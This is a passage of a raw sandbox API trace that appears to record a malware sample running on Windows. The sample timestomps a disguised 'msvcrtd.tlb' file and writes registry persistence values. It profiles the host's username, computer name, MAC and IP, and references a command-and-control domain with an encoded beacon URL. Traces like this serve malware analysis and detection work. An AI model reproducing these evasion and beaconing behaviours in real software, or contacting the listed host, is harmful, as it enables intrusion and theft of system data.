0x0 [0112.243] SetLastError (dwErrCode=0x0) [0112.243] GetLastError () returned 0x0 [0112.243] SetLastError (dwErrCode=0x0) [0112.243] GetLastError () returned 0x0 [0112.243] SetLastError (dwErrCode=0x0) [0112.243] GetLastError () returned 0x0 [0112.243] SetLastError (dwErrCode=0x0) [0112.243] GetLastError () returned 0x0 [0112.243] SetLastError (dwErrCode=0x0) [0112.243] GetLastError () returned 0x0 [0112.243] SetLastError (dwErrCode=0x0) [0112.243] GetLastError () returned 0x0 [0112.243] SetLastError (dwErrCode=0x0) [0112.243] GetLastError () returned 0x0 [0112.243] SetLastError (dwErrCode=0x0) [0112.243] GetLastError () returned 0x0 [0112.243] SetLastError (dwErrCode=0x0) [0112.244] CloseHandle (hObject=0x1c4) returned 1 [0112.244] CloseHandle (hObject=0x114) returned 1 [0112.244] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0112.244] GetFileType (hFile=0x114) returned 0x1 [0112.244] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3fc | out: lpSystemTimeAsFileTime=0x172c3fc*(dwLowDateTime=0x104d82f0, dwHighDateTime=0x1d3dfbb)) [0112.244] GetLastError () returned 0xb7 [0112.244] CloseHandle (hObject=0x114) returned 1 [0112.244] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0112.244] SetFileTime (hFile=0x114, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0112.244] CloseHandle (hObject=0x114) returned 1 [0112.244] strlen (_Str="easport-news.publicvm.com") returned 0x19 [0112.244] strlen (_Str="index/index.php?h=TqFIohTtxkA%3d&d=TKFNQa%2fzUUBOoEeTItv3dXaTfZUk3vZ0fpFIohTtxkBOoUiiFO33dniQfZom2PFwfZF8kiSp93V%2blHyRJtT2dGDLOMU0zeZgboFogjTN5mBugWiCNM3mYM%3d%3d") returned 0xa3 [0112.244] strlen (_Str="166158257030400D1505432904.jpg") returned 0x1e [0112.244] WriteFile (in: hFile=0x1c8, lpBuffer=0x1fd0268*, nNumberOfBytesToWrite=0x10a9, lpNumberOfBytesWritten=0x172e4f4, lpOverlapped=0x311230 | out: lpBuffer=0x1fd0268*, lpNumberOfBytesWritten=0x172e4f4*=0x10a9, lpOverlapped=0x311230) returned 1 [0112.247] ReadFile (in: hFile=0x1c8, lpBuffer=0x171e538, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x171e534, lpOverlapped=0x311230 | out: lpBuffer=0x171e538*, lpNumberOfBytesRead=0x171e534*=0x134, lpOverlapped=0x311230) returned 1 [0112.797] WaitForSingleObject (hHandle=0x1cc, dwMilliseconds=0x7a120) returned 0x0 [0112.797] GetOverlappedResult (in: hFile=0x1c8, lpOverlapped=0x311230, lpNumberOfBytesTransferred=0x171e534, bWait=0 | out: lpNumberOfBytesTransferred=0x171e534) returned 1 [0112.798] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d4, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0112.798] GetFileType (hFile=0x114) returned 0x1 [0112.798] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c400 | out: lpSystemTimeAsFileTime=0x172c400*(dwLowDateTime=0x10a0d310, dwHighDateTime=0x1d3dfbb)) [0112.798] GetLastError () returned 0xb7 [0112.798] CloseHandle (hObject=0x114) returned 1 [0112.798] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0112.798] SetFileTime (hFile=0x114, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0112.798] CloseHandle (hObject=0x114) returned 1 [0112.799] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d4, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0112.799] GetFileType (hFile=0x114) returned 0x1 [0112.799] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c400 | out: lpSystemTimeAsFileTime=0x172c400*(dwLowDateTime=0x10a0d310, dwHighDateTime=0x1d3dfbb)) [0112.799] GetLastError () returned 0xb7 [0112.799] CloseHandle (hObject=0x114) returned 1 [0112.799] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0112.799] SetFileTime (hFile=0x114, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0112.799] CloseHandle (hObject=0x114) returned 1 [0112.799] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172e3a0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0112.799] GetFileType (hFile=0x114) returned 0x1 [0112.800] CloseHandle (hObject=0x114) returned 1 [0112.800] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0112.800] SetFileTime (hFile=0x114, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0112.800] CloseHandle (hObject=0x114) returned 1 [0112.800] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e510 | out: phkResult=0x72f1ed90*=0x114, lpdwDisposition=0x172e510*=0x2) returned 0x0 [0112.800] RegSetValueExA (in: hKey=0x114, lpValueName="FPcnt", Reserved=0x0, dwType=0x4, lpData=0x172e540*=0x0, cbData=0x4 | out: lpData=0x172e540*=0x0) returned 0x0 [0112.800] RegCloseKey (hKey=0x114) returned 0x0 [0112.800] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e50c | out: phkResult=0x72f1ed90*=0x114, lpdwDisposition=0x172e50c*=0x2) returned 0x0 [0112.800] RegQueryValueExA (in: hKey=0x114, lpValueName="FPcnt", lpReserved=0x0, lpType=0x0, lpData=0x172e53c, lpcbData=0x172e540*=0x4 | out: lpType=0x0, lpData=0x172e53c*=0x0, lpcbData=0x172e540*=0x4) returned 0x0 [0112.800] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d4, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0112.800] GetFileType (hFile=0x1c4) returned 0x1 [0112.800] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c400 | out: lpSystemTimeAsFileTime=0x172c400*(dwLowDateTime=0x10a0d310, dwHighDateTime=0x1d3dfbb)) [0112.801] GetLastError () returned 0xb7 [0112.801] CloseHandle (hObject=0x1c4) returned 1 [0112.801] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0112.801] SetFileTime (hFile=0x1c4, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0112.801] CloseHandle (hObject=0x1c4) returned 1 [0112.801] CloseHandle (hObject=0x1c8) returned 1 [0112.801] CloseHandle (hObject=0x1cc) returned 1 [0112.801] CreateFileW (lpFileName="\\\\.\\pipe\\c41b2304" (normalized: "\\device\\namedpipe\\c41b2304"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0112.801] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x1c8 [0112.801] SetNamedPipeHandleState (hNamedPipe=0x1cc, lpMode=0x172e544, lpMaxCollectionCount=0x0, lpCollectDataTimeout=0x0) returned 1 [0112.801] WriteFile (in: hFile=0x1cc, lpBuffer=0x312ec8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x172e540, lpOverlapped=0x311230 | out: lpBuffer=0x312ec8*, lpNumberOfBytesWritten=0x172e540*=0x8, lpOverlapped=0x311230) returned 1 [0112.801] CloseHandle (hObject=0x1cc) returned 1 [0112.801] CloseHandle (hObject=0x1c8) returned 1 [0112.801] TerminateProcess (hProcess=0x0, uExitCode=0x0) returned 0 [0112.801] GetLastError () returned 0x6 [0112.801] CloseHandle (hObject=0x0) returned 0 [0112.801] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172fd04 | out: lpSystemTimeAsFileTime=0x172fd04*(dwLowDateTime=0x10a0d310, dwHighDateTime=0x1d3dfbb)) [0112.802] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172fce8 | out: phkResult=0x72f1ed90*=0x1c8, lpdwDisposition=0x172fce8*=0x2) returned 0x0 [0112.802] RegSetValueExA (in: hKey=0x1c8, lpValueName="LastValue", Reserved=0x0, dwType=0x4, lpData=0x72f1eda8*=0x5ae5fb68, cbData=0x4 | out: lpData=0x72f1eda8*=0x5ae5fb68) returned 0x0 [0112.802] RegCloseKey (hKey=0x1c8) returned 0x0 [0112.802] CloseHandle (hObject=0x1a4) returned 1 [0112.802] GetTickCount () returned 0x2ac07 [0112.802] GetLastError () returned 0x6 [0112.802] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172da9c, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0112.802] GetFileType (hFile=0x1a4) returned 0x1 [0112.802] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dbc8 | out: lpSystemTimeAsFileTime=0x172dbc8*(dwLowDateTime=0x10a0d310, dwHighDateTime=0x1d3dfbb)) [0112.802] GetLastError () returned 0xb7 [0112.802] CloseHandle (hObject=0x1a4) returned 1 [0112.802] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0112.802] SetFileTime (hFile=0x1a4, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0112.802] CloseHandle (hObject=0x1a4) returned 1 Thread: id = 165 os_tid = 0xed0 [0041.542] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0041.542] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0041.542] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0041.542] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0041.543] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0041.543] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0041.543] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0041.543] GetCurrentThreadId () returned 0xed0 [0041.543] GetLastError () returned 0x0 [0041.543] SetLastError (dwErrCode=0x0) [0041.543] Sleep (dwMilliseconds=0x2710) [0051.558] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0051.558] lstrcatW (in: lpString1="", lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0051.558] lstrcatW (in: lpString1="\r\n", lpString2="2.1\r\n0\r\n" | out: lpString1="\r\n2.1\r\n0\r\n") returned="\r\n2.1\r\n0\r\n" [0051.558] GetLastError () returned 0x0 [0051.558] SetLastError (dwErrCode=0x0) [0051.558] GetLastError () returned 0x0 [0051.558] SetLastError (dwErrCode=0x0) [0051.558] GetLastError () returned 0x0 [0051.558] SetLastError (dwErrCode=0x0) [0051.558] _snwprintf (in: _Dest=0x194f948, _Count=0xc8, _Format="%u.%u" | out: _Dest="3.25") returned 4 [0051.558] GetLastError () returned 0x0 [0051.558] SetLastError (dwErrCode=0x0) [0051.558] GetVersionExW (in: lpVersionInformation=0x194f82c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x194f82c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0051.558] GetLastError () returned 0x0 [0051.558] SetLastError (dwErrCode=0x0) [0051.559] GetLastError () returned 0x0 [0051.559] SetLastError (dwErrCode=0x0) [0051.559] GetSystemInfo (in: lpSystemInfo=0x194f924 | out: lpSystemInfo=0x194f924*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0051.559] GetLastError () returned 0x0 [0051.559] SetLastError (dwErrCode=0x0) [0051.559] GetLastError () returned 0x0 [0051.559] SetLastError (dwErrCode=0x0) [0051.559] wsprintfW (in: param_1=0x194f9e0, param_2="%u" | out: param_1="3") returned 1 [0051.559] GetLastError () returned 0x0 [0051.559] SetLastError (dwErrCode=0x0) [0051.559] wsprintfW (in: param_1=0x194f9e4, param_2="%u" | out: param_1="0") returned 1 [0051.559] GetLastError () returned 0x0 [0051.559] SetLastError (dwErrCode=0x0) [0051.559] LoadLibraryA (lpLibFileName="Advapi32") returned 0x76700000 [0051.559] GetProcAddress (hModule=0x76700000, lpProcName="OpenProcessToken") returned 0x76714304 [0051.559] GetProcAddress (hModule=0x76700000, lpProcName="GetTokenInformation") returned 0x7671431c [0051.559] GetProcAddress (hModule=0x76700000, lpProcName="AllocateAndInitializeSid") returned 0x767140e6 [0051.559] GetProcAddress (hModule=0x76700000, lpProcName="EqualSid") returned 0x7671410b [0051.559] GetProcAddress (hModule=0x76700000, lpProcName="FreeSid") returned 0x7671412e [0051.560] GetProcAddress (hModule=0x76700000, lpProcName="CheckTokenMembership") returned 0x7670df04 [0051.560] AllocateAndInitializeSid (in: pIdentifierAuthority=0x194f9a4, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x194f9c0 | out: pSid=0x194f9c0*=0x34a858*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0051.560] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x34a858*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x194f9d8 | out: IsMember=0x194f9d8) returned 1 [0051.560] wsprintfW (in: param_1=0x194f9fc, param_2="%u" | out: param_1="1") returned 1 [0051.560] GetLastError () returned 0x0 [0051.560] SetLastError (dwErrCode=0x0) [0051.560] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x194f60c | out: phkResult=0x72f1ed90*=0xb0, lpdwDisposition=0x194f60c*=0x2) returned 0x0 [0051.560] RegQueryValueExA (in: hKey=0xb0, lpValueName="Plgv", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x194f664*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x194f664*=0x58) returned 0x0 [0051.560] RegQueryValueExA (in: hKey=0xb0, lpValueName="Plgv", lpReserved=0x0, lpType=0x0, lpData=0x300d40, lpcbData=0x194f664*=0x58 | out: lpType=0x0, lpData=0x300d40*=0x88, lpcbData=0x194f664*=0x58) returned 0x0 [0051.560] RegCloseKey (hKey=0xb0) returned 0x0 [0051.560] GetLastError () returned 0x0 [0051.560] SetLastError (dwErrCode=0x0) [0051.560] GetLastError () returned 0x0 [0051.560] SetLastError (dwErrCode=0x0) [0051.560] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x194f60c | out: phkResult=0x72f1ed90*=0xb0, lpdwDisposition=0x194f60c*=0x2) returned 0x0 [0051.560] RegQueryValueExA (in: hKey=0xb0, lpValueName="Plpv", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x194f664*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x194f664*=0x5c) returned 0x0 [0051.560] RegQueryValueExA (in: hKey=0xb0, lpValueName="Plpv", lpReserved=0x0, lpType=0x0, lpData=0x300d40, lpcbData=0x194f664*=0x5c | out: lpType=0x0, lpData=0x300d40*=0x9a, lpcbData=0x194f664*=0x5c) returned 0x0 [0051.560] RegCloseKey (hKey=0xb0) returned 0x0 [0051.560] GetLastError () returned 0x0 [0051.560] SetLastError (dwErrCode=0x0) [0051.560] GetLastError () returned 0x0 [0051.560] SetLastError (dwErrCode=0x0) [0051.561] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x194f640 | out: phkResult=0x72f1ed90*=0xb0, lpdwDisposition=0x194f640*=0x2) returned 0x0 [0051.561] RegQueryValueExA (in: hKey=0xb0, lpValueName="Gdx", lpReserved=0x0, lpType=0x0, lpData=0x194f680, lpcbData=0x194f68c*=0x4 | out: lpType=0x0, lpData=0x194f680*=0xff, lpcbData=0x194f68c*=0x4) returned 0x2 [0051.561] wsprintfW (in: param_1=0x194f6f0, param_2="%u" | out: param_1="4294967295") returned 10 [0051.561] GetLastError () returned 0x0 [0051.561] SetLastError (dwErrCode=0x0) [0051.561] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x194f640 | out: phkResult=0x72f1ed90*=0xac, lpdwDisposition=0x194f640*=0x2) returned 0x0 [0051.561] RegQueryValueExA (in: hKey=0xac, lpValueName="Pdx", lpReserved=0x0, lpType=0x0, lpData=0x194f680, lpcbData=0x194f68c*=0x4 | out: lpType=0x0, lpData=0x194f680*=0xff, lpcbData=0x194f68c*=0x4) returned 0x2 [0051.561] wsprintfW (in: param_1=0x194f6f0, param_2="%u" | out: param_1="4294967295") returned 10 [0051.561] GetLastError () returned 0x0 [0051.561] SetLastError (dwErrCode=0x0) [0051.561] wsprintfW (in: param_1=0x194f6f0, param_2="%u" | out: param_1="60") returned 2 [0051.561] GetLastError () returned 0x0 [0051.561] SetLastError (dwErrCode=0x0) [0051.561] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x194f5dc | out: phkResult=0x72f1ed90*=0xb4, lpdwDisposition=0x194f5dc*=0x2) returned 0x0 [0051.561] RegQueryValueExA (in: hKey=0xb4, lpValueName="ISRValue", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x194f634*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x194f634*=0x0) returned 0x0 [0051.561] RegCloseKey (hKey=0xb4) returned 0x0 [0051.561] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x194f5cc | out: phkResult=0x72f1ed90*=0xb4, lpdwDisposition=0x194f5cc*=0x2) returned 0x0 [0051.561] RegQueryValueExA (in: hKey=0xb4, lpValueName="ISFValue", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x194f624*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x194f624*=0x0) returned 0x0 [0051.561] RegCloseKey (hKey=0xb4) returned 0x0 [0051.561] GetLocalTime (in: lpSystemTime=0x194f7f8 | out: lpSystemTime=0x194f7f8*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0x1d, wHour=0xb, wMinute=0x6, wSecond=0x2c, wMilliseconds=0x2a7)) [0051.561] wsprintfW (in: param_1=0x194f808, param_2="%02d:%02d:%04d %02d:%02d:%02d" | out: param_1="29:04:2018 11:06:44") returned 19 [0051.561] GetLastError () returned 0x0 [0051.561] SetLastError (dwErrCode=0x0) [0051.561] GetProcAddress (hModule=0x761d0000, lpProcName="GetTimeZoneInformation") returned 0x76208a3b [0051.561] GetTimeZoneInformation (in: lpTimeZoneInformation=0x194f968 | out: lpTimeZoneInformation=0x194f968) returned 0x2 [0051.562] wsprintfW (in: param_1=0x194f954, param_2="%02d" | out: param_1="-6") returned 2 [0051.562] GetLastError () returned 0x0 [0051.562] SetLastError (dwErrCode=0x0) [0051.562] GetComputerNameW (in: lpBuffer=0x194f808, nSize=0x194f804 | out: lpBuffer="CRH2YWU7", nSize=0x194f804) returned 1 [0051.562] GetLastError () returned 0xcb [0051.562] SetLastError (dwErrCode=0xcb) [0051.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableW") returned 0x762265c4 [0051.562] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x194f80c, nSize=0x104 | out: lpBuffer="EEBsYm5") returned 0x7 [0051.562] GetLastError () returned 0xcb [0051.562] SetLastError (dwErrCode=0xcb) [0051.562] GetWindowsDirectoryW (in: lpBuffer=0x194f808, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0051.562] GetLastError () returned 0xcb [0051.562] SetLastError (dwErrCode=0xcb) [0051.562] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x194f808 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0051.562] GetLastError () returned 0xcb [0051.562] SetLastError (dwErrCode=0xcb) [0051.562] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0051.562] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x72f1e648, cbMultiByte=38, lpWideCharStr=0x194f80c, cchWideChar=260 | out: lpWideCharStr="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0051.562] GetLastError () returned 0xcb [0051.562] SetLastError (dwErrCode=0xcb) [0051.562] GetVersionExA (in: lpVersionInformation=0x194f7f0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x300d20, dwMinorVersion=0x76234be7, dwBuildNumber=0x6f0057, dwPlatformId=0x6b0072, szCSDVersion="D") | out: lpVersionInformation=0x194f7f0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0051.562] LoadLibraryA (lpLibFileName="iphlpapi.dll") returned 0x74130000 [0051.564] GetProcAddress (hModule=0x74130000, lpProcName="GetAdaptersInfo") returned 0x74139263 [0051.564] GetProcAddress (hModule=0x74130000, lpProcName="GetPerAdapterInfo") returned 0x7413d3b8 [0051.564] GetAdaptersInfo (in: AdapterInfo=0x0, SizePointer=0x194f950 | out: AdapterInfo=0x0, SizePointer=0x194f950) returned 0x6f [0051.569] GetAdaptersInfo (in: AdapterInfo=0x312ca8, SizePointer=0x194f950 | out: AdapterInfo=0x312ca8, SizePointer=0x194f950) returned 0x0 [0051.570] wsprintfA (in: param_1=0x194eff0, param_2="%s" | out: param_1="Intel(R) PRO/1000 MT Network Connection") returned 39 [0051.570] lstrlenA (lpString="Intel(R) PRO/1000 MT Network Connection") returned 39 [0051.570] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x194eff0, cbMultiByte=39, lpWideCharStr=0x194e6e8, cchWideChar=1024 | out: lpWideCharStr="Intel(R) PRO/1000 MT Network Connection") returned 39 [0051.570] GetLastError () returned 0x0 [0051.570] SetLastError (dwErrCode=0x0) [0051.570] wsprintfA (in: param_1=0x194eff0, param_2="%02X:%02X:%02X:%02X:%02X:%02X" | out: param_1="00:05:E3:BB:1E:97") returned 17 [0051.571] lstrlenA (lpString="00:05:E3:BB:1E:97") returned 17 [0051.571] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x194eff0, cbMultiByte=17, lpWideCharStr=0x194e6e8, cchWideChar=1024 | out: lpWideCharStr="00:05:E3:BB:1E:97") returned 17 [0051.571] GetLastError () returned 0x0 [0051.571] SetLastError (dwErrCode=0x0) [0051.571] wsprintfW (in: param_1=0x194e6e8, param_2="%d" | out: param_1="6") returned 1 [0051.571] GetLastError () returned 0x0 [0051.571] SetLastError (dwErrCode=0x0) [0051.571] GetLastError () returned 0x0 [0051.571] SetLastError (dwErrCode=0x0) [0051.571] lstrlenA (lpString="192.168.0.34") returned 12 [0051.571] 